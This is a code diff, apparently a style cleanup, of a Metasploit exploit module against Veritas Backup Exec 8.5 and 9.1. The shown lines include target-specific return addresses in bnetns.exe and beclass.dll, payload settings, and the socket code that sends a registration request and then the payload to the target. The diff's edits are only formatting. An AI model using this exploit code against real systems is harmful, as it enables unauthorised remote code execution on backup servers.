@@ -39,22 +39,21 @@ class MetasploitModule < Msf::Exploit::Remote
         'Payload' => {
           'Space' => 1024,
           'MinNops' => 512,
-          'StackAdjustment' => -3500,
+          'StackAdjustment' => -3500
         },
-        'Platform' => %w{win},
         'Targets' => [
           [
             'Veritas BE 9.1 SP0/SP1', # BackupExec 9.1 SP0/SP1 return contributed by class101
             {
               'Platform' => 'win',
-              'Rets' => [ 0x0142ffa1, 0x401150FF ], # recv@bnetns.exe v9.1.4691.0 | esi@bnetns.exe
+              'Rets' => [ 0x0142ffa1, 0x401150FF ] # recv@bnetns.exe v9.1.4691.0 | esi@bnetns.exe
             },
           ],
           [
             'Veritas BE 8.5',
             {
               'Platform' => 'win',
-              'Rets' => [ 0x014308b9, 0x401138FF ], # recv@bnetns.exe v8.50.3572 | esi@beclass.dll v8.50.3572
+              'Rets' => [ 0x014308b9, 0x401138FF ] # recv@bnetns.exe v8.50.3572 | esi@beclass.dll v8.50.3572
             },
           ],
         ],
@@ -103,10 +102,10 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Sending the agent registration request of #{req.length} bytes...")
     sock.put(req)
 
-    print_status("Sending the payload stage down the socket...")
+    print_status('Sending the payload stage down the socket...')
     sock.put(payload.encoded)
 
-    print_status("Waiting for the payload to execute...")
+    print_status('Waiting for the payload to execute...')
     select(nil, nil, nil, 2)
 
     handler
